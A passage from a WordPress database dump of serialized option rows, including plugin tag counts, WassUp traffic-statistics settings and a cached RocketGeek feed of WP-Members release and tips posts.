:\"name\";s:6:\"social\";s:4:\"slug\";s:6:\"social\";s:5:\"count\";s:4:\"1323\";}s:5:\"links\";a:3:{s:4:\"name\";s:5:\"links\";s:4:\"slug\";s:5:\"links\";s:5:\"count\";s:4:\"1268\";}s:7:\"gallery\";a:3:{s:4:\"name\";s:7:\"gallery\";s:4:\"slug\";s:7:\"gallery\";s:5:\"count\";s:4:\"1266\";}s:5:\"email\";a:3:{s:4:\"name\";s:5:\"email\";s:4:\"slug\";s:5:\"email\";s:5:\"count\";s:4:\"1165\";}s:7:\"widgets\";a:3:{s:4:\"name\";s:7:\"widgets\";s:4:\"slug\";s:7:\"widgets\";s:5:\"count\";s:4:\"1079\";}s:5:\"pages\";a:3:{s:4:\"name\";s:5:\"pages\";s:4:\"slug\";s:5:\"pages\";s:5:\"count\";s:4:\"1056\";}s:6:\"jquery\";a:3:{s:4:\"name\";s:6:\"jquery\";s:4:\"slug\";s:6:\"jquery\";s:5:\"count\";s:3:\"991\";}s:5:\"media\";a:3:{s:4:\"name\";s:5:\"media\";s:4:\"slug\";s:5:\"media\";s:5:\"count\";s:3:\"949\";}s:3:\"rss\";a:3:{s:4:\"name\";s:3:\"rss\";s:4:\"slug\";s:3:\"rss\";s:5:\"count\";s:3:\"908\";}s:9:\"ecommerce\";a:3:{s:4:\"name\";s:9:\"ecommerce\";s:4:\"slug\";s:9:\"ecommerce\";s:5:\"count\";s:3:\"907\";}s:4:\"ajax\";a:3:{s:4:\"name\";s:4:\"AJAX\";s:4:\"slug\";s:4:\"ajax\";s:5:\"count\";s:3:\"887\";}s:5:\"video\";a:3:{s:4:\"name\";s:5:\"video\";s:4:\"slug\";s:5:\"video\";s:5:\"count\";s:3:\"882\";}s:7:\"content\";a:3:{s:4:\"name\";s:7:\"content\";s:4:\"slug\";s:7:\"content\";s:5:\"count\";s:3:\"876\";}s:5:\"login\";a:3:{s:4:\"name\";s:5:\"login\";s:4:\"slug\";s:5:\"login\";s:5:\"count\";s:3:\"872\";}s:10:\"javascript\";a:3:{s:4:\"name\";s:10:\"javascript\";s:4:\"slug\";s:10:\"javascript\";s:5:\"count\";s:3:\"819\";}s:10:\"buddypress\";a:3:{s:4:\"name\";s:10:\"buddypress\";s:4:\"slug\";s:10:\"buddypress\";s:5:\"count\";s:3:\"770\";}s:10:\"responsive\";a:3:{s:4:\"name\";s:10:\"responsive\";s:4:\"slug\";s:10:\"responsive\";s:5:\"count\";s:3:\"769\";}s:8:\"security\";a:3:{s:4:\"name\";s:8:\"security\";s:4:\"slug\";s:8:\"security\";s:5:\"count\";s:3:\"755\";}s:4:\"spam\";a:3:{s:4:\"name\";s:4:\"spam\";s:4:\"slug\";s:4:\"spam\";s:5:\"count\";s:3:\"735\";}s:5:\"photo\";a:3:{s:4:\"name\";s:5:\"photo\";s:4:\"slug\";s:5:\"photo\";s:5:\"count\";s:3:\"734\";}s:4:\"feed\";a:3:{s:4:\"name\";s:4:\"feed\";s:4:\"slug\";s:4:\"feed\";s:5:\"count\";s:3:\"733\";}s:7:\"youtube\";a:3:{s:4:\"name\";s:7:\"youtube\";s:4:\"slug\";s:7:\"youtube\";s:5:\"count\";s:3:\"726\";}s:4:\"link\";a:3:{s:4:\"name\";s:4:\"link\";s:4:\"slug\";s:4:\"link\";s:5:\"count\";s:3:\"725\";}s:5:\"share\";a:3:{s:4:\"name\";s:5:\"Share\";s:4:\"slug\";s:5:\"share\";s:5:\"count\";s:3:\"719\";}s:10:\"e-commerce\";a:3:{s:4:\"name\";s:10:\"e-commerce\";s:4:\"slug\";s:10:\"e-commerce\";s:5:\"count\";s:3:\"717\";}s:8:\"category\";a:3:{s:4:\"name\";s:8:\"category\";s:4:\"slug\";s:8:\"category\";s:5:\"count\";s:3:\"685\";}s:6:\"photos\";a:3:{s:4:\"name\";s:6:\"photos\";s:4:\"slug\";s:6:\"photos\";s:5:\"count\";s:3:\"680\";}s:5:\"embed\";a:3:{s:4:\"name\";s:5:\"embed\";s:4:\"slug\";s:5:\"embed\";s:5:\"count\";s:3:\"666\";}s:9:\"analytics\";a:3:{s:4:\"name\";s:9:\"analytics\";s:4:\"slug\";s:9:\"analytics\";s:5:\"count\";s:3:\"666\";}s:4:\"form\";a:3:{s:4:\"name\";s:4:\"form\";s:4:\"slug\";s:4:\"form\";s:5:\"count\";s:3:\"661\";}s:3:\"css\";a:3:{s:4:\"name\";s:3:\"CSS\";s:4:\"slug\";s:3:\"css\";s:5:\"count\";s:3:\"655\";}s:6:\"search\";a:3:{s:4:\"name\";s:6:\"search\";s:4:\"slug\";s:6:\"search\";s:5:\"count\";s:3:\"646\";}s:9:\"slideshow\";a:3:{s:4:\"name\";s:9:\"slideshow\";s:4:\"slug\";s:9:\"slideshow\";s:5:\"count\";s:3:\"628\";}s:6:\"custom\";a:3:{s:4:\"name\";s:6:\"custom\";s:4:\"slug\";s:6:\"custom\";s:5:\"count\";s:3:\"624\";}s:6:\"slider\";a:3:{s:4:\"name\";s:6:\"slider\";s:4:\"slug\";s:6:\"slider\";s:5:\"count\";s:3:\"621\";}s:5:\"stats\";a:3:{s:4:\"name\";s:5:\"stats\";s:4:\"slug\";s:5:\"stats\";s:5:\"count\";s:3:\"609\";}s:6:\"button\";a:3:{s:4:\"name\";s:6:\"button\";s:4:\"slug\";s:6:\"button\";s:5:\"count\";s:3:\"599\";}s:7:\"comment\";a:3:{s:4:\"name\";s:7:\"comment\";s:4:\"slug\";s:7:\"comment\";s:5:\"count\";s:3:\"591\";}s:5:\"theme\";a:3:{s:4:\"name\";s:5:\"theme\";s:4:\"slug\";s:5:\"theme\";s:5:\"count\";s:3:\"584\";}s:4:\"tags\";a:3:{s:4:\"name\";s:4:\"tags\";s:4:\"slug\";s:4:\"tags\";s:5:\"count\";s:3:\"581\";}s:4:\"menu\";a:3:{s:4:\"name\";s:4:\"menu\";s:4:\"slug\";s:4:\"menu\";s:5:\"count\";s:3:\"581\";}s:9:\"dashboard\";a:3:{s:4:\"name\";s:9:\"dashboard\";s:4:\"slug\";s:9:\"dashboard\";s:5:\"count\";s:3:\"580\";}s:10:\"categories\";a:3:{s:4:\"name\";s:10:\"categories\";s:4:\"slug\";s:10:\"categories\";s:5:\"count\";s:3:\"567\";}s:10:\"statistics\";a:3:{s:4:\"name\";s:10:\"statistics\";s:4:\"slug\";s:10:\"statistics\";s:5:\"count\";s:3:\"556\";}s:6:\"mobile\";a:3:{s:4:\"name\";s:6:\"mobile\";s:4:\"slug\";s:6:\"mobile\";s:5:\"count\";s:3:\"550\";}s:3:\"ads\";a:3:{s:4:\"name\";s:3:\"ads\";s:4:\"slug\";s:3:\"ads\";s:5:\"count\";s:3:\"545\";}s:4:\"user\";a:3:{s:4:\"name\";s:4:\"user\";s:4:\"slug\";s:4:\"user\";s:5:\"count\";s:3:\"535\";}s:6:\"editor\";a:3:{s:4:\"name\";s:6:\"editor\";s:4:\"slug\";s:6:\"editor\";s:5:\"count\";s:3:\"534\";}s:5:\"users\";a:3:{s:4:\"name\";s:5:\"users\";s:4:\"slug\";s:5:\"users\";s:5:\"count\";s:3:\"521\";}s:4:\"list\";a:3:{s:4:\"name\";s:4:\"list\";s:4:\"slug\";s:4:\"list\";s:5:\"count\";s:3:\"515\";}s:7:\"picture\";a:3:{s:4:\"name\";s:7:\"picture\";s:4:\"slug\";s:7:\"picture\";s:5:\"count\";s:3:\"504\";}s:9:\"affiliate\";a:3:{s:4:\"name\";s:9:\"affiliate\";s:4:\"slug\";s:9:\"affiliate\";s:5:\"count\";s:3:\"503\";}s:7:\"plugins\";a:3:{s:4:\"name\";s:7:\"plugins\";s:4:\"slug\";s:7:\"plugins\";s:5:\"count\";s:3:\"502\";}s:6:\"simple\";a:3:{s:4:\"name\";s:6:\"simple\";s:4:\"slug\";s:6:\"simple\";s:5:\"count\";s:3:\"489\";}s:9:\"multisite\";a:3:{s:4:\"name\";s:9:\"multisite\";s:4:\"slug\";s:9:\"multisite\";s:5:\"count\";s:3:\"488\";}s:12:\"contact-form\";a:3:{s:4:\"name\";s:12:\"contact form\";s:4:\"slug\";s:12:\"contact-form\";s:5:\"count\";s:3:\"474\";}s:12:\"social-media\";a:3:{s:4:\"name\";s:12:\"social media\";s:4:\"slug\";s:12:\"social-media\";s:5:\"count\";s:3:\"473\";}s:7:\"contact\";a:3:{s:4:\"name\";s:7:\"contact\";s:4:\"slug\";s:7:\"contact\";s:5:\"count\";s:3:\"460\";}s:8:\"pictures\";a:3:{s:4:\"name\";s:8:\"pictures\";s:4:\"slug\";s:8:\"pictures\";s:5:\"count\";s:3:\"452\";}s:10:\"navigation\";a:3:{s:4:\"name\";s:10:\"navigation\";s:4:\"slug\";s:10:\"navigation\";s:5:\"count\";s:3:\"435\";}s:3:\"url\";a:3:{s:4:\"name\";s:3:\"url\";s:4:\"slug\";s:3:\"url\";s:5:\"count\";s:3:\"435\";}s:4:\"html\";a:3:{s:4:\"name\";s:4:\"html\";s:4:\"slug\";s:4:\"html\";s:5:\"count\";s:3:\"430\";}s:4:\"shop\";a:3:{s:4:\"name\";s:4:\"shop\";s:4:\"slug\";s:4:\"shop\";s:5:\"count\";s:3:\"429\";}s:3:\"api\";a:3:{s:4:\"name\";s:3:\"api\";s:4:\"slug\";s:3:\"api\";s:5:\"count\";s:3:\"427\";}s:5:\"flash\";a:3:{s:4:\"name\";s:5:\"flash\";s:4:\"slug\";s:5:\"flash\";s:5:\"count\";s:3:\"423\";}s:9:\"marketing\";a:3:{s:4:\"name\";s:9:\"marketing\";s:4:\"slug\";s:9:\"marketing\";s:5:\"count\";s:3:\"420\";}s:10:\"newsletter\";a:3:{s:4:\"name\";s:10:\"newsletter\";s:4:\"slug\";s:10:\"newsletter\";s:5:\"count\";s:3:\"416\";}s:4:\"meta\";a:3:{s:4:\"name\";s:4:\"meta\";s:4:\"slug\";s:4:\"meta\";s:5:\"count\";s:3:\"416\";}s:4:\"news\";a:3:{s:4:\"name\";s:4:\"News\";s:4:\"slug\";s:4:\"news\";s:5:\"count\";s:3:\"402\";}s:3:\"tag\";a:3:{s:4:\"name\";s:3:\"tag\";s:4:\"slug\";s:3:\"tag\";s:5:\"count\";s:3:\"402\";}s:6:\"events\";a:3:{s:4:\"name\";s:6:\"events\";s:4:\"slug\";s:6:\"events\";s:5:\"count\";s:3:\"402\";}s:8:\"calendar\";a:3:{s:4:\"name\";s:8:\"calendar\";s:4:\"slug\";s:8:\"calendar\";s:5:\"count\";s:3:\"401\";}s:8:\"tracking\";a:3:{s:4:\"name\";s:8:\"tracking\";s:4:\"slug\";s:8:\"tracking\";s:5:\"count\";s:3:\"398\";}s:11:\"advertising\";a:3:{s:4:\"name\";s:11:\"advertising\";s:4:\"slug\";s:11:\"advertising\";s:5:\"count\";s:3:\"395\";}s:10:\"shortcodes\";a:3:{s:4:\"name\";s:10:\"shortcodes\";s:4:\"slug\";s:10:\"shortcodes\";s:5:\"count\";s:3:\"390\";}s:9:\"thumbnail\";a:3:{s:4:\"name\";s:9:\"thumbnail\";s:4:\"slug\";s:9:\"thumbnail\";s:5:\"count\";s:3:\"389\";}s:4:\"text\";a:3:{s:4:\"name\";s:4:\"text\";s:4:\"slug\";s:4:\"text\";s:5:\"count\";s:3:\"387\";}s:4:\"code\";a:3:{s:4:\"name\";s:4:\"code\";s:4:\"slug\";s:4:\"code\";s:5:\"count\";s:3:\"382\";}s:6:\"upload\";a:3:{s:4:\"name\";s:6:\"upload\";s:4:\"slug\";s:6:\"upload\";s:5:\"count\";s:3:\"380\";}s:9:\"automatic\";a:3:{s:4:\"name\";s:9:\"automatic\";s:4:\"slug\";s:9:\"automatic\";s:5:\"count\";s:3:\"380\";}s:6:\"paypal\";a:3:{s:4:\"name\";s:6:\"paypal\";s:4:\"slug\";s:6:\"paypal\";s:5:\"count\";s:3:\"379\";}s:7:\"sharing\";a:3:{s:4:\"name\";s:7:\"sharing\";s:4:\"slug\";s:7:\"sharing\";s:5:\"count\";s:3:\"377\";}s:12:\"notification\";a:3:{s:4:\"name\";s:12:\"notification\";s:4:\"slug\";s:12:\"notification\";s:5:\"count\";s:3:\"377\";}}','yes'),(12526,'_site_transient_timeout_browser_dee24e1cb8ffa5ebe8021356c173956d','1457593599','yes'),(12529,'_site_transient_browser_dee24e1cb8ffa5ebe8021356c173956d','a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"48.0.2564.116\";s:10:\"update_url\";s:28:\"http://www.google.com/chrome\";s:7:\"img_src\";s:49:\"http://s.wordpress.org/images/browsers/chrome.png\";s:11:\"img_src_ssl\";s:48:\"https://wordpress.org/images/browsers/chrome.png\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}','yes'),(12592,'wassup_settings','a:40:{s:14:\"wassup_refresh\";s:1:\"3\";s:16:\"wassup_userlevel\";s:1:\"8\";s:17:\"wassup_screen_res\";s:3:\"800\";s:19:\"wassup_default_type\";s:10:\"everything\";s:23:\"wassup_default_spy_type\";s:10:\"everything\";s:20:\"wassup_default_limit\";s:2:\"10\";s:12:\"wassup_top10\";s:321:\"a:12:{s:8:\"toplimit\";s:2:\"10\";s:9:\"topsearch\";s:1:\"1\";s:11:\"topreferrer\";s:1:\"1\";s:9:\"toppostid\";s:1:\"1\";s:10:\"toprequest\";s:1:\"1\";s:10:\"topbrowser\";s:1:\"1\";s:5:\"topos\";s:1:\"1\";s:9:\"toplocale\";s:1:\"0\";s:10:\"topvisitor\";s:1:\"0\";s:19:\"topreferrer_exclude\";s:0:\"\";s:15:\"top_nofrontpage\";s:1:\"0\";s:12:\"top_nospider\";s:1:\"0\";}\";s:18:\"wassup_time_format\";s:2:\"24\";s:18:\"wassup_time_period\";s:1:\"1\";s:13:\"wassup_active\";s:1:\"1\";s:15:\"wassup_loggedin\";s:1:\"1\";s:12:\"wassup_admin\";s:1:\"1\";s:13:\"wassup_spider\";s:1:\"1\";s:14:\"wassup_exclude\";s:0:\"\";s:19:\"wassup_exclude_host\";s:0:\"\";s:18:\"wassup_exclude_url\";s:0:\"\";s:19:\"wassup_exclude_user\";s:0:\"\";s:16:\"wassup_spamcheck\";s:1:\"1\";s:11:\"wassup_spam\";s:1:\"1\";s:14:\"wassup_refspam\";s:1:\"1\";s:13:\"wassup_attack\";s:1:\"1\";s:11:\"wassup_hack\";s:1:\"1\";s:12:\"wassup_table\";s:9:\"wp_wassup\";s:15:\"wassup_dbengine\";s:0:\"\";s:16:\"wassup_uninstall\";s:1:\"0\";s:11:\"delete_auto\";s:5:\"never\";s:13:\"delete_filter\";s:0:\"\";s:15:\"wassup_optimize\";s:10:\"1463277600\";s:16:\"wassup_remind_mb\";s:3:\"100\";s:18:\"wassup_remind_flag\";s:1:\"1\";s:14:\"delayed_insert\";s:1:\"0\";s:22:\"wassup_dashboard_chart\";s:1:\"0\";s:12:\"wassup_chart\";s:1:\"1\";s:17:\"wassup_chart_type\";s:1:\"2\";s:16:\"wassup_geoip_map\";s:1:\"1\";s:21:\"wassup_googlemaps_key\";s:0:\"\";s:5:\"whash\";s:32:\"851050cb4ac018cc9b6c18cc7580831e\";s:20:\"wassup_alert_message\";s:0:\"\";s:14:\"wassup_version\";s:3:\"1.9\";s:15:\"wassup_upgraded\";s:10:\"1456990787\";}','yes'),(13060,'_transient_timeout_feed_5a25458da46a336967a55e430a3eace5','1457423940','no'),(13063,'_transient_feed_5a25458da46a336967a55e430a3eace5','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:34:\"\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:3:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"RocketGeek Interactive\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://rocketgeek.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"Home of WP-Members, The Original WordPress Membership Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 07 Mar 2016 15:05:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=4.4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:5:{i:0;a:6:{s:4:\"data\";s:33:\"\n \n \n \n \n \n \n \n\n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"WP-Members User List 1.8 Release Notes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://rocketgeek.com/release-announcements/wp-members-user-list-1-8-release-notes/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 22 Feb 2016 17:01:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:21:\"Release Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:7:\"updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:9:\"user-list\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"http://rocketgeek.com/?p=9616\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:356:\"Today I released an update for the WP-Members User List with some needed updates. I continued (and I believe, completed) the ongoing updates to the code to implement compatibility with the current WP code standards and documentation standard. This also included the removal of the use of the php extract() function. This doesn’t mean […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:33:\"\n \n \n \n \n \n \n \n\n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Add reCAPTCHA to the Login Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://rocketgeek.com/tips-and-tricks/add-recaptcha-to-the-login-form/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 18 Jan 2016 21:42:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and Tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:21:\"wpmem_login_form_rows\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:20:\"wp_authenticate_user\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"http://rocketgeek.com/?p=9350\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"This custom script is similar to the process described in “Add Really Simple CAPTCHA to the Login Form” except that it uses reCAPTCHA. Prerequisites You need to have reCAPTCHA version 2 enabled in the plugin settings and have valid API keys installed. This is specific to reCAPTCHA version 2 – version 1 is being deprecated […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:27:\"\n \n \n \n \n \n\n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WP-Members 3.0.9\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"http://rocketgeek.com/release-announcements/wp-members-3-0-9/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 12 Jan 2016 00:56:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"Release Announcements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"http://rocketgeek.com/?p=9288\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:328:\"WP-Members 3.0.9 contains a number of small additions and a few fixes. It is primarily a feature release as the fixes are primarily improvements. Custom Post Type Support The main new feature is native support for Custom Post Types. CPT support did not work out well when first introduced in 3.0.0, which is why […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad Butler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:42:\"\n \n \n \n \n \n \n \n \n\n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Push user directly to PayPal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://rocketgeek.com/tips-and-tricks/push-user-directly-to-paypal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"http://rocketgeek.com/tips-and-tricks/push-user-directly-to-paypal/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Dec 2015 21:26:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:15:\"Tips and Tricks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:6:\"paypal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:24:\"wpmem_post_register_data\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"http://rocketgeek.com/?p=9179\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:323:\"I recently had a user ask how he might be able to push a user to PayPal without the need to click the “Continue to PayPal” button. Since the extension relies on the PayPal IPN system and is intended to avoid the need for setting up payment gateways and the headaches of managing user’s financial […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Chad 